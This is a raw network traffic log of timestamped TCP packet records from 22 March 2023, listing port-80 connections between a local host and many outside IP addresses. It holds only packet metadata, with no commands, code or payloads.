                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:09.728054047 CET4971780192.168.2.552.71.57.184
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:09.775959015 CET4971780192.168.2.552.71.57.184
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:09.895946026 CET4972080192.168.2.552.71.57.184
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:09.925385952 CET804971752.71.57.184192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:09.930440903 CET8049712206.191.152.37192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.045717001 CET804972052.71.57.184192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.048433065 CET4972080192.168.2.552.71.57.184
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.078457117 CET4972080192.168.2.552.71.57.184
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.124778986 CET4972180192.168.2.580.74.154.6
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.132375956 CET4972280192.168.2.5172.67.152.159
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.134663105 CET4972380192.168.2.5192.124.249.10
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.138381004 CET4972480192.168.2.581.2.194.241
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.148895025 CET4972580192.168.2.5135.181.73.98
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.149164915 CET804972180.74.154.6192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.149244070 CET4972180192.168.2.580.74.154.6
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.153446913 CET8049722172.67.152.159192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.153595924 CET4972280192.168.2.5172.67.152.159
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.155529022 CET4972180192.168.2.580.74.154.6
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.155580044 CET4972280192.168.2.5172.67.152.159
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.158356905 CET8049723192.124.249.10192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.158489943 CET4972380192.168.2.5192.124.249.10
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.158941031 CET4972380192.168.2.5192.124.249.10
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.176709890 CET8049722172.67.152.159192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.179625034 CET804972481.2.194.241192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.179797888 CET4972480192.168.2.581.2.194.241
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.179863930 CET804972180.74.154.6192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.179881096 CET804972180.74.154.6192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.179987907 CET4972180192.168.2.580.74.154.6
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.182475090 CET8049723192.124.249.10192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.182980061 CET8049723192.124.249.10192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.184716940 CET4972380192.168.2.5192.124.249.10
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.191546917 CET8049725135.181.73.98192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.192483902 CET4972580192.168.2.5135.181.73.98
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.227454901 CET804972052.71.57.184192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.227493048 CET804972052.71.57.184192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.227579117 CET4972080192.168.2.552.71.57.184
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.244112015 CET8049722172.67.152.159192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.244139910 CET8049722172.67.152.159192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.244157076 CET8049722172.67.152.159192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.244204044 CET4972280192.168.2.5172.67.152.159
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.244275093 CET4972280192.168.2.5172.67.152.159
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.244275093 CET4972280192.168.2.5172.67.152.159
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.317217112 CET4972080192.168.2.552.71.57.184
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.396538019 CET4972480192.168.2.581.2.194.241
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.396612883 CET4972580192.168.2.5135.181.73.98
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.439151049 CET804972481.2.194.241192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.440140009 CET8049725135.181.73.98192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.440459967 CET8049725135.181.73.98192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.441102982 CET4972580192.168.2.5135.181.73.98
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.447525024 CET804972481.2.194.241192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.449269056 CET4972480192.168.2.581.2.194.241
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.466202974 CET804972052.71.57.184192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.538157940 CET4972380192.168.2.5192.124.249.10
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.538314104 CET4972180192.168.2.580.74.154.6
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.562844038 CET8049723192.124.249.10192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.562992096 CET804972180.74.154.6192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.563118935 CET4972180192.168.2.580.74.154.6
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.563119888 CET4972380192.168.2.5192.124.249.10
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.563143969 CET804971882.201.61.230192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.563467026 CET4971880192.168.2.582.201.61.230
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.702325106 CET4972580192.168.2.5135.181.73.98
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.702723980 CET4972480192.168.2.581.2.194.241
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.745392084 CET8049725135.181.73.98192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.745507956 CET4972580192.168.2.5135.181.73.98
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.754143000 CET804972481.2.194.241192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.754246950 CET4972480192.168.2.581.2.194.241
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.887540102 CET4972680192.168.2.589.161.163.246
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.924499989 CET804972689.161.163.246192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.924606085 CET4972680192.168.2.589.161.163.246
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.945319891 CET4972680192.168.2.589.161.163.246
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.982929945 CET804972689.161.163.246192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.982978106 CET804972689.161.163.246192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.983012915 CET804972689.161.163.246192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.983052969 CET4972680192.168.2.589.161.163.246
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.983091116 CET4972680192.168.2.589.161.163.246
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.037642956 CET4970080192.168.2.5137.118.26.67
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.090580940 CET4972780192.168.2.5185.80.51.179
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.091367960 CET4972880192.168.2.5188.165.133.163
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.091530085 CET4972980192.168.2.5202.254.236.40
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.092025042 CET4973080192.168.2.5172.67.173.200
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.113518953 CET8049730172.67.173.200192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.113626003 CET4973080192.168.2.5172.67.173.200
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.114027977 CET4973080192.168.2.5172.67.173.200
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.115741014 CET8049728188.165.133.163192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.115840912 CET4972880192.168.2.5188.165.133.163
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.116601944 CET4972880192.168.2.5188.165.133.163
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.123275995 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.126254082 CET8049727185.80.51.179192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.126374960 CET4972780192.168.2.5185.80.51.179
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.126683950 CET4972780192.168.2.5185.80.51.179
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.136537075 CET8049730172.67.173.200192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.141675949 CET8049728188.165.133.163192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.141706944 CET8049728188.165.133.163192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.141792059 CET4972880192.168.2.5188.165.133.163
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.144584894 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.146603107 CET8049730172.67.173.200192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.146728992 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.147947073 CET4973080192.168.2.5172.67.173.200
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.162041903 CET8049727185.80.51.179192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.162378073 CET8049727185.80.51.179192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.162477016 CET4972780192.168.2.5185.80.51.179
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.167227983 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.188754082 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.223432064 CET4972780192.168.2.5185.80.51.179
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.224244118 CET4972880192.168.2.5188.165.133.163
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.224461079 CET4973280192.168.2.5192.252.154.18
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.224515915 CET4973380192.168.2.518.119.154.66
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.248603106 CET8049728188.165.133.163192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.252541065 CET4972880192.168.2.5188.165.133.163
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.259402037 CET8049727185.80.51.179192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.259489059 CET4972780192.168.2.5185.80.51.179
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.327476025 CET8049732192.252.154.18192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.328547955 CET4973280192.168.2.5192.252.154.18
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.378427029 CET8049729202.254.236.40192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.378741980 CET4972980192.168.2.5202.254.236.40
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.383282900 CET804973318.119.154.66192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.383382082 CET4973380192.168.2.518.119.154.66
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.432610989 CET4973280192.168.2.5192.252.154.18
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.535613060 CET8049732192.252.154.18192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.537724018 CET8049732192.252.154.18192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.537816048 CET4973280192.168.2.5192.252.154.18
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.538307905 CET4972980192.168.2.5202.254.236.40
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.547957897 CET4973380192.168.2.518.119.154.66
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.555351973 CET4973480192.168.2.560.43.154.138
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.706352949 CET804973318.119.154.66192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.706372023 CET804973318.119.154.66192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.706489086 CET4973380192.168.2.518.119.154.66
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.707314968 CET4973580192.168.2.5108.167.164.216
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.708372116 CET4973380192.168.2.518.119.154.66
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.722008944 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.722034931 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.722054958 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.722074032 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.722086906 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.722094059 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.722112894 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.722131968 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.722150087 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.722168922 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.722187996 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.722207069 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.722213984 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.722213984 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.722213984 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.722223997 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.722259998 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.722259998 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.722373962 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.733659983 CET4973680192.168.2.546.242.238.60
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.733737946 CET4973780192.168.2.5193.166.255.171
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.738560915 CET4973880192.168.2.518.119.154.66
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.748753071 CET4973980192.168.2.569.163.239.62
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.755275011 CET804972481.2.194.241192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.755414009 CET4972480192.168.2.581.2.194.241
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.770407915 CET804973646.242.238.60192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.770503044 CET4973680192.168.2.546.242.238.60
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.770874023 CET4973680192.168.2.546.242.238.60
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.783864975 CET8049737193.166.255.171192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.783978939 CET4973780192.168.2.5193.166.255.171
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.791958094 CET4973780192.168.2.5193.166.255.171
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.807636023 CET804973646.242.238.60192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.809295893 CET804973646.242.238.60192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.809386969 CET4973680192.168.2.546.242.238.60
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.825241089 CET8049729202.254.236.40192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.826622009 CET8049729202.254.236.40192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.826683044 CET4972980192.168.2.5202.254.236.40
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.835633993 CET8049735108.167.164.216192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.835757971 CET4973580192.168.2.5108.167.164.216
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.836014032 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.836034060 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.836173058 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.836216927 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.836313963 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.836313963 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.836505890 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.836525917 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.836545944 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.836811066 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.836811066 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.837316990 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.837336063 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.837399960 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.837399960 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.837444067 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.837579012 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.838644981 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.838742018 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.838749886 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.838776112 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.839150906 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.839150906 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.839276075 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.839312077 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.839332104 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.839642048 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.839642048 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.839642048 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.839890957 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.839910030 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.839930058 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.840445995 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.840446949 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.840446949 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.840639114 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.840658903 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.840677977 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.840699911 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.840699911 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.840729952 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.841172934 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.841195107 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.841212034 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.841303110 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.841303110 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.841303110 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.842261076 CET8049737193.166.255.171192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.842333078 CET8049737193.166.255.171192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.849560976 CET804973460.43.154.138192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.849664927 CET4973480192.168.2.560.43.154.138
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.867058992 CET804973318.119.154.66192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.897202015 CET804973818.119.154.66192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.897488117 CET4973880192.168.2.518.119.154.66
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.918021917 CET804973969.163.239.62192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.918122053 CET4973980192.168.2.569.163.239.62
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.942764997 CET4973580192.168.2.5108.167.164.216
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.942802906 CET4973480192.168.2.560.43.154.138
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.942964077 CET4972980192.168.2.5202.254.236.40
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.943380117 CET4973880192.168.2.518.119.154.66
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.943711996 CET4973980192.168.2.569.163.239.62
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.950638056 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.950726986 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.950814962 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.950834990 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.950994015 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.951014042 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.951033115 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.951086998 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.951086998 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.951173067 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.951631069 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.951652050 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.951669931 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.951801062 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.951831102 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.952368975 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.952389002 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.952409029 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.952559948 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.952559948 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.953217030 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.953238010 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.953258038 CET8049731172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.953386068 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.953412056 CET4973180192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.954029083 CET8049731172.67.201.26192.168.2.5
